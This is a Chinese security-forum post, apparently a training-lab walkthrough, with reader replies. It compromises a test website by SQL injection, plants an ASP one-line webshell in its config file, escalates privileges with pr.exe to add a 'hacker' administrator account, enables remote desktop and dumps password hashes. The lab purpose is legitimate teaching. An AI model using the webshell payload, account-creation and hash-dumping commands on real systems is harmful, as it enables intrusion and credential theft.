用户
搜索
  • TA的每日心情
    奋斗
    昨天 10:35
  • 签到天数: 130 天

    连续签到: 2 天

    [LV.7]常住居民III

    i春秋-核心白帽

    Rank: 4

    7

    主题

    270

    帖子

    1503

    魔法币
    收听
    27
    粉丝
    86
    注册时间
    2015-10-19

    突出贡献专家顾问团核心白帽

    发表于 2015-11-17 11:56:47 20833947
    本帖最后由 独狼1927 于 2016-2-19 00:12 编辑

    55.png

    系列文章:
    05-在线挑战详细攻略-《2015中国网络安全大赛:框架漏洞真题》

    Setp 0
    实验环境
    操作机:Windows XP [172.16.11.2]
    目标机:Windows server 2003 [172.16.12.2]
    实验工具: 中国菜刀 Pr 御剑 Pangolin 3389
    本实验要求获取www.test.ichunqiu网站的服务器权限。
    ps:图片可单击放大观看。

    Step 1
    目录扫描
    工具:御剑   
    路径:C:\Tools\目录扫描\
    打开御剑,在域名中输入http://www.test.ichunqiu,开始扫描;
    00.png

    在目录列表中查找后台,发现存在/admin
    01.png

    双击打开后台登录页面http://www.test.ichunqiu/admin
    02.png

    不过用户名和密码都不知道,没关系,进行下一步:获取用户名和密码。

    Step 2
    工具:旁注WEB综合检测程序Ver3.6修正版
    路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe
    03.png

    打开工具,依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点];
    04.png

    出现下面这个对话框说明已经检测完毕;
    05.png

    点击OK进行下一步;
    注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择 [检测注入];
    06.png

    点击 [检测注入] 后,主界面从 [批量扫描注入点] 转到 [SQL注入猜解检测],点击 [开始检测];
    07.png

    检测完毕后,显示可以注入,并列出了数据库类型:Access数据库;
    08.png

    下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容];点击 [猜解表名] 后,在数据库列表中会显示4个表,分别是admin、user、movie和news;
    09.png

    选择admin表,点击 [猜解列名],成功猜解出三个列名id、username和password;
    10.png

    勾选username和password,点击 [猜解内容],右侧列表中成功显示用户名admin,密码469e80d32c0559f8
    11.png

    当然密码是MD5加密的,打开本机浏览器,输入http://www.cmd5.com,输入刚刚查询到的密文,点击 [解密];
    12.png

    成功找到明文密码:admin888;
    注入的方法与工具很多,或者也可以这样:在浏览器中打开网站首页http://www.test.ichunqiu,在最新产品中随便选择一个打开 [注入点太多];
    13.png

    14.png

    复制URL [www.test.ichunqiu/ProductShow.asp?ID=7],使用工具:穿山甲
    工具:[穿山甲Pangolin]   
    路径: C:\Tools\注入工具\pangolin
    Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法;
    15.png

    打开穿山甲,输入URL,点击绿色三角箭头进行注入操作;
    16.png

    点击 [Dates] 切换到Dates选项卡,点击 [Tables] 成功猜解出4张表;
    17.png

    获取内容的原理同Domain的使用方法一样,[猜解表名]-->[猜解列名]-->[猜解内容];

    同样能获取用户名和密码;
    56.png
    下一步:登录后台,上传木马;

    Setp 3
    打开后台登录页面,输入用户名admin,密码admin888,输入验证码,点击 [ENTER] 登录后台;
    19.png

    久违的后台终于进去了….
    20.png

    点击左侧菜单栏中的 [系统设置管理]-->[网站信息配置],用修改配置文件的方法获取WebShell;
    21.png

    打开相应页面后,将 [公司名称] 内容修改为一句话木马 "%><%Eval Request(Chr(35))%><%'
    写一句话木马的时候注意闭合;
    22.png
    点击最下面的 [保存设置] 按钮;
    23.png

    如果插马成功,[公司名称] 内容为空;
    24.png

    打开 [中国菜刀] 连接一句话木马;
    工具:中国菜刀    路径:C:\Tools\webshell\中国菜刀
    25.png

    打开菜刀,右键空白处,选择 [添加];
    26.png

    在地址栏中输入http://www.test.ichunqiu/inc/config.asp,为什么是这个路径?因为我们刚才修改的网站信息配置页面,就是这个路径,可以自己下载一个魅力企业网站管理系统源码看看,2007或2009版的都行,里面的目录结构一目了然;
    连接密码为#,密码为什么是#? 往上看一句话木马,里面有个chr(35),#的ascii码就是35,当然这个密码可以随便设置,只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可,点击 [添加];
    27.png

    添加成功后会新增一条记录;
    28.png

    双击这个URL,成功进入!
    29.png

    解释一下一句话木马
    /inc/config.asp的源码是这样的:
    1. <%
    2. Const SiteName="魅力企业网站管理系统 2007 中英繁商业正式版"        '网站名称
    3. Const EnSiteName="MSCOM 2007"        '网站名称
    4. Const SiteTitle="魅力软件"        '网站标题
    5. Const EnSiteTitle="MelyySoft"        '网站标题
    6. Const SiteUrl="www.melyysoft.com"        '网站地址
    7. Const Miibeian="湘ICP备05011184号"        '网站备案号
    8. ….
    9. %>
    复制代码

    构造一句话木马:
    1. "%><%Eval Request(Chr(35))%><%'
    复制代码

    插入一句话木马后,config.asp代码会变成这样:
    1. <%
    2. Const SiteName=""%><%Eval Request(Chr(35))%><% '"        '网站名称
    3. Const EnSiteName="MSCOM 2007"        '网站名称
    4. Const SiteTitle="魅力软件"        '网站标题
    5. Const EnSiteTitle="MelyySoft"        '网站标题
    6. Const SiteUrl="www.melyysoft.com"        '网站地址
    7. Const Miibeian="湘ICP备05011184号"        '网站备案号
    8. ….
    9. %>
    复制代码

    代码再整理规范一点就是这样:
    1. <%Const SiteName=""%>
    2. <%Eval Request(Chr(35))%>
    3. <% '"        '网站名称
    4. Const EnSiteName="MSCOM 2007"        '网站名称
    5. Const SiteTitle="魅力软件"        '网站标题
    6. Const EnSiteTitle="MelyySoft"        '网站标题
    7. Const SiteUrl="www.melyysoft.com"        '网站地址
    8. Const Miibeian="湘ICP备05011184号"        '网站备案号
    9. ….
    10. %>
    复制代码

    所以插入一句话木马一定要保证整个代码的语法是正确的,否则肯定不成功;
    下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码;

    Step 4
    进入C:\RECYCLER目录,准备上传提权工具;当然可写的目录不知这一个,还有其他的;
    30.png

    提权工具包括pr,3389,cmd,路径:C:\Tools\提权工具\windows
    31.png

    开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传;
    32.png

    上传成功;
    33.png

    Pr.exe提权
    Windows跟踪注册表项的ACL权限提升漏洞  KB952004  MS09-012
    Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM权限的提升。
    使用方法:
    1. pr.exe "net user hacker 123 /add & net localgroup administrators hacker /add"
    复制代码
    net user hacker 123 /add
    添加一个用户名为hacker、密码为123的账户;
    net localgroup administrators hacker /add  
    将账户hacker添加到管理员组;
    提权有很多种,如巴西烤肉Churrasco.exe等;
    下一步,执行提权操作;
    右键cmd.exe,选择 [虚拟终端]
    34.png

    成功进入,将目录切换到C:\RECYCLER
    35.png

    用pr.exe执行cmd命令,添加账户;
    1. pr "net user hacker 123 /add"
    复制代码

    第一次执行命令有可能不成功,怎么办?
    36.png

    没关系,再执行一次就OK了;
    37.png

    账户添加成功,下一步,将hacker账户添加到系统管理员组;
    1. pr "net localgroup administrators hacker /add"
    复制代码

    38.png

    添加成功,下一步,开启3389;
    1. pr 3389
    复制代码

    39.png

    如果出现如上图中的一大堆命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机;
    [开始]-->[运行]-->mstsc
    40.png

    如果找不见目标IP地址,请点击右上角 [场景拓扑图] 进行查看:
    41.png

    输入目标IP地址:172.16.12.2,开始连接,继续输入用户名hacker和密码123,进入系统;
    42.png

    43.png

    3389连接成功!下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 ,还是使用菜刀上传;
    44.png

    工具一大堆,随便用,这里我们使用QuarksPwDum,开始上传;
    45.png

    上传成功,进入目标机,运行QuarksPwDump  
    :打开cmd,用命令行启动QuarksPwDump,不要直接双击;
    46.png

    运行后,会出现如下界面:
    47.png

    继续输入命令:
    1. QuarksPwDump --dump-hash-local
    复制代码

    48.png

    执行后的结果如下:
    49.png

    成功获取到administrator的hash:62C4700EBB05958F3832C92FC614B7D1:4D478675344541AACCF6CF33E1DD9D85
    暂时切换出实验环境,在你的电脑上打开浏览器输入http://www.objectif-securite.ch/en/ophcrack.php,在页面的相应位置输入hash,然后GO;
    ps:如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站点很多;
    50.png

    最终结果输出:
    51.png
    ___________________________________________________________________________________________________________________________________________
    WVS
    WVS [Web Vulnerability Scanner] 是一个自动化的Web应用程序安全测试工具。
    官网:https://www.acunetix.com/
    1、WVS可以通过检查sql注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序。
    2、它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。
    3、除了自动化地扫描可以利用的漏洞,WVS还提供了分析现有通用产品和客户定制产品(包括那些依赖于JavaScript的程序即AJAX应用程序)的一个强健的解决方案。
    4、登录保护页面的自动扫描 。一个网站最有可能被攻击和容易受到攻击的区域往往是那些需要用户登录的区域。  因此对的Acunetix最新版本现在可以自动地和轻松浏览复杂的验证区域,不再需要经常需要手动干预。  这包括可以扫描使用单点登录(SSO)和基于OAuth认证的Web应用程序。
    5、检测WP核心和WP插件的漏洞。 可以检测超过1200个WordPress 核心和插件的漏洞,目前全球市场上没有其他扫描器可以检测这么多的WordPress漏洞。  WordPress网站已经超过了7400万,在WordPress核心发现一个漏洞,或甚至在某一个插件的漏洞都可用于攻击数百万的个人网站。  
    6、支持各种开发架构和Web服务 。许多企业级,任务关键的应用程序基本都是使用Java框架或Ruby on Rails建立的。第10版经过精心设计,可精确抓取扫描和使用这些技术构建的Web应用程序。  另外随着不断上升的HTML5单页面的应用程序和移动应用,Web服务已经成为一个显著的攻击向量。  新版本改进了对使用WSDL和WCF描述基于SOAP的Web服务支持,使用WADL定义自动扫描RESTful Web服务。  其“深度扫描”爬行引擎可以非常迅速的分析同时使用Java框架和Ruby on Rails开发的Web应用程序。  
    7、检测恶意软件和钓鱼网址 Acunetix WVS 10将附带一个URL的恶意软件检测服务,  这是用来分析所有的扫描过程中找到的外部链接,针对不断更新的恶意软件和钓鱼网址数据库,这项恶意软件检测服务利用了谷歌和Yandex的安全浏览数据库。   
    8、支持外部第三方工具。如Fiddler、Burp Suite和Selenium IDE,以加强业务逻辑测试和手动测试和自动化的工作流。
    界面:

    52.png
    报告输出:
    53.png
    54.png


    本次实验到此结束,希望对大家有所帮助,有不足之处请大家多多指正! 下一讲:《网站综合渗透实验》。


    ps:所有图片全部来自真实操作截图,部分知识点的内容转自FreeBuf黑客与极客(FreeBuf.COM)与网络;路漫漫其修远兮,感谢一路上黑友们的帮助@lonnyboy。



    --END--

    评分

    参与人数 31魔法币 +177 收起 理由
    野蔷薇 + 1 感谢你的分享,i春秋论坛有你更精彩!.
    Devin_xx + 3
    超级小小小白 + 1
    xuha + 5
    spanuitree + 3 感谢你的分享,i春秋论坛有你更精彩!.
    木muO_o + 2 感谢你的分享,i春秋论坛有你更精彩!没什.
    PGV5 + 10 谢谢大表哥 感谢!!!
    Ycrazy + 1 感谢你的分享,i春秋论坛有你更精彩!.
    狂人 + 5 有钱任性!
    半仙 + 1 鼓励转贴优秀软件安全工具和文档!.
    Rocky + 50 感谢发布原创作品,i春秋论坛因你更精彩!.
    Icec + 1
    gssdmlp + 5 我很赞同!
    yanzhi + 5 我很赞同!
    搞笑哈 + 5 谢谢@Thanks!
    ZxCv + 5 谢谢@Thanks!
    Oomje + 5 谢谢@Thanks!
    icqf11779d1 + 5 我很赞同!
    萧逸辰 + 5 谢谢@Thanks!
    路明非 + 5 我很赞同!

    查看全部评分

    本帖被以下淘专辑推荐:

    不够成熟而已 发表于 2016-12-4 16:50
    能说下巴西烤肉的提权过程吗

    Microsoft Windows WMI服务隔离本地权限提升漏洞(MS09-012)
    Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM级的权限提升。
    使用道具 举报 回复
    还有关于  quarkspwdump问题的   我觉得是不是没有把用户增加远程管理员权限啊,建立一个批处理1.bat文件上传至目标目录下,1.BAT批处理内的内容为net localgroup "Remote Desktop Users" 你建立的用户名 /add,然后pr “1.bat”。这样再试试呢
    使用道具 举报 回复
    笨嘴的猫cat 发表于 2015-12-2 10:46
    非常感谢楼主的教程,但是最后的HASH的部分我有一些不一样的地方,求指点如图 ...

    没有仔细看攻略;你少了一步,打开cmd,用命令行启动QuarksPwDump,之后再输入QuarksPwDump --dump-hash-local
    使用道具 举报 回复
    发表于 2015-11-28 17:55:15
    独狼1927 发表于 2015-11-25 21:37
    一次不成功就结束实验重新开始,500说明服务端出现错误,即使你后面的一句话是对的,也不行;仔细一点 ...

    另外 我想请问,在学WEB前端渗透,看html-css-js-sql数据库语言-asp-php的路线对吗?
    使用道具 举报 回复
    i潘多拉 发表于 2015-11-19 11:21
    上存了pr cmd 3389之后,键盘就按不了了,也不算按不了,例如敲“d” 的话就会变成窗口最小化,怎么回事? ...

    检查一下你的键盘CTRL键是不是被卡住了,如果键盘按键正常,就先结束实验,重新开始实验。
    使用道具 举报 回复
    发表于 2015-11-17 18:18:59
    狼头  我来坐沙发  
    使用道具 举报 回复
    发表于 2015-11-17 20:01:10
    顶起!必须赞一个!!
    使用道具 举报 回复
    发表于 2015-11-17 21:18:47
    wchar 发表于 2015-11-17 18:18
    狼头  我来坐沙发

    欢迎
    使用道具 举报 回复
    发表于 2015-11-17 21:19:23
    ssss1 发表于 2015-11-17 20:01
    顶起!必须赞一个!!

    使用道具 举报 回复
    发表于 2015-11-17 22:35:44
    狼哥辛苦了
    使用道具 举报 回复
    发表于 2015-11-17 22:38:01
    新手的福音,谢谢狼头
    使用道具 举报 回复
    发表于 2015-11-18 00:14:11
    好赞啊
    使用道具 举报 回复
    赶脚好厉害 楼主
    什么都不会,但就是学的快
    使用道具 举报 回复

    为二师兄服务应该的!
    使用道具 举报 回复
    发表于 2015-11-18 10:30:33
    好棒的。 ,,
    人生苦短,快用python!
    blog:github.so
    使用道具 举报 回复
    发表于 2015-11-18 10:45:34
    很不错! 赞!
    同样是一个B,往北走是NB,往南走就是SB,所以人生的方向很重要!
    使用道具 举报 回复
    发表于 2015-11-18 12:19:29
    感谢  通过这样细致的分解  收益良多  谢谢
    是以天下溪水为温柔,昼夜难休。
    使用道具 举报 回复
    发表于 2015-11-18 12:40:33
    新手学习
    使用道具 举报 回复
    发表于 2015-11-18 13:28:41

    顶起!必须赞一个!!
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册